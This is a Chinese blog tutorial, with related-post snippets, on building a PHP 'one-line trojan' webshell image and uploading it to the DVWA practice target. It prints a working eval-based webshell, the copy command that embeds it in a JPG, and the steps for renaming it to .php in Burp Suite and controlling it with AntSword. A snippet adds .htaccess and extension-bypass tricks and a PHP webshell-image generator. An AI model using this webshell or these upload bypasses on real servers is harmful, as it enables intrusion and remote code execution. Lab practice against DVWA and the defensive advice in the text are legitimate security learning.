上传图片格式一句话木马

DVWA上传一句话木马
最新推荐文章于 2025-09-06 13:23:59 发布
原创 最新推荐文章于 2025-09-06 13:23:59 发布 · 1.4w 阅读 · 99 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #windows #linux #服务器 #安全

一、 随便找一张jpg图片在这里插入图片描述
二、 新建一个txt文档在这里插入图片描述
三、 在文本文档中写入一句话木马
本次实验使用的木马为password
<?php @eval($_POST['密码']);?>

在这里插入图片描述

四、 写入完成后将后缀名.txt改为.php在这里插入图片描述
五、 合并文件
通过CMD进入储存jpg文件和php文件的目录
命令格式: cd C:\muma
使用copy命令合并文件
命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg
最后输出合并的木马文件muma.jpg在这里插入图片描述
六、 打开靶场登陆DVWA
默认用户名admin
默认密码password在这里插入图片描述
七、更改安全性
左侧点击DVWA Security更改安全性 改为low点击 Submit 确定在这里插入图片描述
八、 准备上传
点击左侧的File Upload(文件上传)
然后将FoxyProxyBurp代理打开

FoxyProxy安装与配置
在这里插入图片描述

九、 开启BURP SUITE
kali直接在终端中输入burpsuite即可打开
Windows与mac端需要自行安装

在这里插入图片描述

十、 配置BURP
BURP内点击Proxy(代理)再点击Intercept(截断)之后等待数据包在这里插入图片描述
十一、 上传
点击浏览 选择刚刚合并出来的muma.jpg文件 然后点击上传或者(Upload)在这里插入图片描述
十二、BURP截包
点击上传后 浏览器开始无响应 开始BURP发现已经将数据包拦截了下来在这里插入图片描述
十三、 修改数据包
将下方抓到的宝muma.jpg改为muma.php然后点击右上角的放包(Forward)一直点击 直到变成灰色无法点击为止在这里插入图片描述
十四、 查看上传路径
红字提示上传文件到../../hackable/uploads/muma.php
当前URL栏中的路径为/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../的意思为返回上一级目录 两个../../代表返回前两个目录 也就代表返回到了/xxx.xxx.xxx.xxx/DVWA/目录
结合提供的路径得出 上传的完整路径为/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php在这里插入图片描述
十五、 验证木马
在浏览器的URL栏中输入刚刚得出的路径 查看是否能得到反馈 出现信息 代表木马存在 然后复制下当前的URL地址等待连接在这里插入图片描述
十六、 连接木马
打开蚁剑 右键空白处 点击添加数据在这里插入图片描述
URL地址中粘贴刚刚复制的地址
连接密码填写制作一句话木马时设置的密码在这里插入图片描述
完成后点击添加
窗口自动关闭 下方显示添加数据成功在这里插入图片描述
双击添加的木马 出现文件列表 代表一句话木马上传并成功在这里插入图片描述
相关链接 FoxyProxy安装与配置

如有问题 还请见谅

注意:本实验仅供个人测试时使用 请勿用于非法用途

文件上传漏洞—一句话图片马制作
weixin_44431280的博客
02-28 1万+
文件上传漏洞—一句话图片马制作 提要:在文件上传漏洞中,通常需要上传脚本类型的文件至服务端执行,获取WebShell,但是通常网站会严格过滤脚本类型的文件,这个时候便可以通过图片马来突破。 简介:就是在图片格式文件(JPG,PNG和GIF等)中隐藏一句话木马,利用文件包含漏洞,Web容器解析漏洞和.htaccess文件解析成对应的脚本,达到可以被Web容器执行的效果。 利用场景:因为图片格式的文件默认是不会被Web容器解析的,所以通过需要借助到文件包含漏洞,Web容器解析漏洞和.htaccess文件。 图片
一句话木马与图片马
野原新之助
01-16 6983
何为木马? 所谓木马,即向目标主机种植恶意软件或程序(木马),通过主机与目标主机上种植好的木马进行连接,建立一个shell,达到控制目标主机的目的。 比较著名的木马有冰河、灰鸽子等,这些木马都是对主机进行控制。 今天总结的一句话木马,是通过对目标站点、服务器植入木马文件,对网站进行渗透控制。 通常对网站的木马文件植入,都是利用文件上传漏洞进行植入的,先植入小马,再通过小马将大马植入。 小马 小马一...
如何制作图片一句话木马
qq_52676257的博客
03-09 3416
如何制作图片一句话木马 新建一个文件夹,在其中放入一张图片(图片后缀名只要是图片的那几个后缀名即可)和一句话木马,例如: 其中的一句话木马为 <?php @eval($_POST["value"]);?> 再写入一个cmd的bat文件 然后打开bat文件 并输入copy tp.jpg/b+yjh.php shell.jpg 这样就会在先前所建的文件夹里,得到了一张新的图片,我命名为了shell.jpg,这时我们就得到了所需要的图片一句话木马。 ...
图片一句话木马简单制作方法
热门推荐
TimeOldman的博客
12-01 5万+
小白对于制作一句话木马的心得,也是给自己留个印象。
图片木马制作的三种方法
最新发布
跟佟格码路一起学习计算机知识吧~
09-06 836
图片木马在网络上没有统一的定义,在这里我给出自己的定义。图片木马是一张能正常显示又包含恶意代码(比如一句话木马)的图片文件。图片能正常显示包含能执行的而已代码总体思路:将恶意代码写在图片文件中非图片数据区,防止写入导致图片损坏。常规的图片格式有gif,png,jpg格式。
上传漏洞-一句话木马
Coisini的博客
05-30 8931
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
Web(5)Burpsuite之文件上传漏洞
m0_66039322的博客
11-18 972
因为是进行前端JS校验,因此可以直接在浏览器检查代码把checkFile()函数(即如下图红色框选中的函数)删了或者也可以把红色框改成true,并按回车,即可成功上传php文件。这一关黑名单,使用str_ireplace()函数寻找文件名中存在的黑名单字符串,将它替换成空(即将它删掉),可以使用双写绕过黑名单。用老版的php,2016版的php,主要是版本问题,新版的phpstudy都是nts,只有老版里有ts,我们需要ts版才能解析文件。的图片马绕过,并使用文件包含漏洞解析图片马。
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 9648
文件上传的番外,一句话木马绕过思路,第二版整理,还是会根据做题经验增补的~
一句话图片木马
qq_44111753的博客
08-20 1万+
一句话图片木马 一、准备图片木马 1、准备任意图片pho.jpg 2、准备木马文件hack.php <?php @eval($_POST['hack']);?> 3、利用系统命令,将木马复制到图片文件中,产生图片木马hack.jpg copy pho.jpg/b+hack.php/a hack.jpg b二进制格式,a为ASCII 二、上传图片 三、利用文件包含漏洞解析图片木马(没有文件包含漏洞图片木马将无法执行) 1、 右键图片复制图片地址,找到图片木马具体位置(upload//4820
记一次对DZ的渗透.(一句话木马与图片,文件上传解析漏洞)
键盘的起始页
01-11 2203
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 文件上传后导致的常见安全问题一般有: 1)上传文件是Web脚本语言,服务器的Web容器解释并执行了用户上传的脚本,导致代码执行。 2)上传文件是Flash的策略文件crossdomain.xml,黑客用以控制Flash在该域下的行为(其他通过类似方式控制策
文件上传漏洞以及一句话木马
SY_China27的博客
11-01 1390
文件上传是web系统中常见的一种功能,通过文件能上传各种类型的文件,这其中随着web包含的功能越来越多,也变得越来越大恶意用户上传了,就会导致网站被其控制,甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。
asp防止上传图片木马原理解析
10-23
通过读取文件的前几个字节(通常称为文件签名或魔数),可以判断文件的类型是否为常见的图片格式,如JPEG、GIF、BMP、PNG等。每种格式的图片文件都有特定的签名。以JPEG为例,通常以0xFFD8开头。代码中使用了数组来...
BugKu~二手交易市场:文件上传漏洞+一句话木马
xhxtalent的博客
10-20 1503
看到图片类型是jpeg,并且还有base64的加密,我们把一句话木马进行base64的加密并且修改文件类型为php上传上传成功,并且返回文件路径,将原始路径+/Uploads/heads/75f940ada20db345.php。到处随便点点看看,有没有什么疑似可以利用的地方。那么上传用户头像,有没有想到上传一个图片马的想法呢!很好我们已经连上了后台,在后台文件里查找一下flag吧。flag也出来了,这次的文件上传也就结束了。打开网站可以看到是一个类似于淘宝商城的页面。引入眼帘的是上传用户头像。
图片写入一句话木马
qq_53065516的博客
03-28 7467
图片制作一句话木马: 1:选择一个图片用工具打开,winhex或者其他工具都可以,例如我选取一张图片用winhex打开,然后在其后写入一句话木马,在这里我的一句话木马是:<?php @eval($_POST['pass']);?> 可以发现成功写入。 将此文件上传入dvwa后,在D:\phpstudy_pro\WWW\DVWA-master\hackable\uploads会发现出现我修改后的图片1.jpg 此时dvwa出现/…/hackable/uploads/1.jpg succesf
用bat制作图片马——一句话木马
AiENG_07的博客
11-29 1623
此命令关闭在控制台中回显命令,因此只有命令的输出可见,而不是命令本身。: 使用二进制拷贝将图像文件和 PHP 文件合并,并创建一个新的图像文件。使用 copy 命令将两个文件的内容合并,创建一个新的图像文件。: 提示用户将 PHP 文件拖放到窗口中,并按 Enter。: 提示用户确保图像文件和 PHP 文件位于相同的路径下。: 提示用户将图像文件拖放到窗口中,并按 Enter。提示用户输入图像文件和 PHP 文件的路径。: 用于接收用户输入的 PHP 文件路径。: 用于接收用户输入的图像文件路径。
一句话木马图片制作
Kyl2n的博客
11-05 2733
常见一句话木马php一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> 使用工具: 一台能使用cmd命令的电脑 步骤1: 在记事本中加入一句话木马,保存。如:a.txt 准备一张图片(文件大小
图片一句话木马的简单制作
sweetie 的博客
11-11 1410
新建一个文件夹 其中放入一张图片,shell.php一句话木马,写入cmd的bat文件 shell.php中的一句话木马内容为 <?php @eval($_POST[sweetie]);?> 点击bat文件进入DOS命令,写入"copy 1.jpg/b+shell.php shell.jpg" 回车 ...
如何使用命令行合成一句话图片木马
dhgogogogogogo的博客
11-28 4500
简单的合成一句话图片木马的方法,除此之外,还可以使用Photoshop合成
创建一句话木马(图片马)
weixin_45571987的博客
04-04 1696
图片一句话木马的编写使用cmd命令行创建图片一句话木马 使用cmd命令行创建图片一句话木马 copy 1.jpg/b+1.php/a 5.jpg 这边图片木马就成功创建了
利用图片上传一句话木马
03-19
<think>好的,我现在需要帮助用户了解如何通过图片上传实现一句话木马的相关技术和方法。首先,我得回顾一下用户提供的引用内容,看看有哪些相关信息可以利用。 用户提到了文件上传漏洞和WebShell,特别是引用[3]指出,管理员如果没有进行安全过滤,攻击者可以通过上传危险文件控制服务器。这应该是核心点。图片上传作为文件上传的一种,可能被滥用。需要解释攻击者如何将一句话木马嵌入图片中,绕过检测。 接下来,用户提供的引用[2]提到Web木马的特点,比如用ASP、PHP等编写,作为后门。所以,可能需要结合图片文件和脚本代码的结合方式。比如,在图片的元数据中插入恶意代码,或者利用二次渲染漏洞。 引用[4]中的例子用了管道符执行命令,可能涉及到服务器处理上传文件时的命令执行漏洞。但用户的问题是关于图片上传,所以可能需要其他方法,比如.htaccess文件配合图片马,或者利用MIME类型检测的缺陷。 然后,我需要考虑步骤。首先,攻击者制作图片木马,可能通过直接追加代码到图片末尾,或者使用Exif工具添加恶意内容。然后,找到存在上传漏洞的站点,上传这个图片。接着,利用解析漏洞或本地文件包含,让服务器将图片当作PHP等脚本执行。 同时,要提到安全漏洞的利用技术,比如绕过前端验证(修改Content-Type,扩展名)、服务端过滤不严、解析漏洞(比如Apache的解析顺序问题)。引用[1]提到WebShell的危害,所以需要强调这种攻击的实际影响,比如控制服务器、窃取数据等。 最后,防御措施方面,引用[3]提到管理员应进行安全过滤,比如白名单验证、重命名文件、禁用危险函数等。这部分也要涵盖,确保回答全面。 需要确保回答结构清晰,分步骤说明实现方式,漏洞原理,以及防御方法。同时,使用正确的LaTeX格式,比如变量用$...$,独立公式用$$...$$,但在这个问题中可能用不到太多数学公式,所以可能主要关注代码块和格式要求。 可能还需要生成相关问题,比如如何检测图片木马,防御上传漏洞的方法,或者解析漏洞的例子。这些问题要围绕用户的核心问题展开,帮助用户进一步学习。 现在,整理思路,组织语言,确保每个技术点都有对应的引用支持,并且符合用户的要求,用中文回答,结构清晰。</think>### 图片上传实现一句话木马的技术与方法 #### 1. **技术原理** 通过图片文件上传漏洞,攻击者可将一句话木马嵌入图片中,利用服务器对文件类型、内容或解析逻辑的缺陷,使其被当作可执行脚本处理,从而控制服务器[^3]。 #### 2. **实现步骤** **(1)制作图片木马** - **直接拼接法**:将一句话木马代码追加到图片文件末尾。 ```bash copy normal.jpg + shell.php webshell.jpg ``` - **Exif注释注入**:利用图片的Exif元数据字段插入恶意代码。 ```php <?php @eval($_POST['cmd']); ?> # 典型的一句话木马 ``` **(2)绕过文件类型检测** - **修改HTTP头**:伪造`Content-Type`为`image/jpeg`,欺骗前端验证。 - **双重扩展名**:命名文件为`shell.jpg.php`,利用解析漏洞触发脚本执行[^2]。 **(3)利用服务器漏洞** - **解析漏洞**:例如Apache的“从右向左”解析特性(如`shell.jpg.php`可能被解析为PHP)。 - **本地文件包含(LFI)**:通过其他漏洞调用上传的图片文件,触发代码执行。 ```php include($_GET['file']); # 参数可控时可能包含恶意图片 ``` **(4)配合.htaccess文件** 上传自定义的`.htaccess`文件,强制将图片解析为PHP脚本: ```apache AddType application/x-httpd-php .jpg ``` #### 3. **安全漏洞利用技术** - **二次渲染绕过**:针对服务端对图片的压缩/裁剪操作,调整恶意代码位置使其在渲染后保留[^4]。 - **条件竞争**:在文件被删除前访问恶意图片,触发木马驻留。 - **编码混淆**:使用Base64、十六进制编码隐藏恶意代码,规避内容检测。 #### 4. **防御措施** - **文件类型白名单**:仅允许`.jpg`、`.png`等扩展名,禁止可执行类型。 - **内容检测**:使用图像库(如GD)二次渲染,破坏嵌入的代码。 - **重命名+随机目录**:避免直接访问上传文件,禁用脚本执行权限[^1]。 - **禁用危险函数**:关闭`eval()`、`system()`等高风险PHP函数。 --- ### 代码示例(图片木马生成) ```php <?php // 生成包含一句话木马的图片 $image = imagecreate(100, 100); imagejpeg($image, 'webshell.jpg'); file_put_contents('webshell.jpg', "\n<?php @eval(\$_POST['cmd']); ?>", FILE_APPEND); ?> ``` ---
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Stars-Again

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值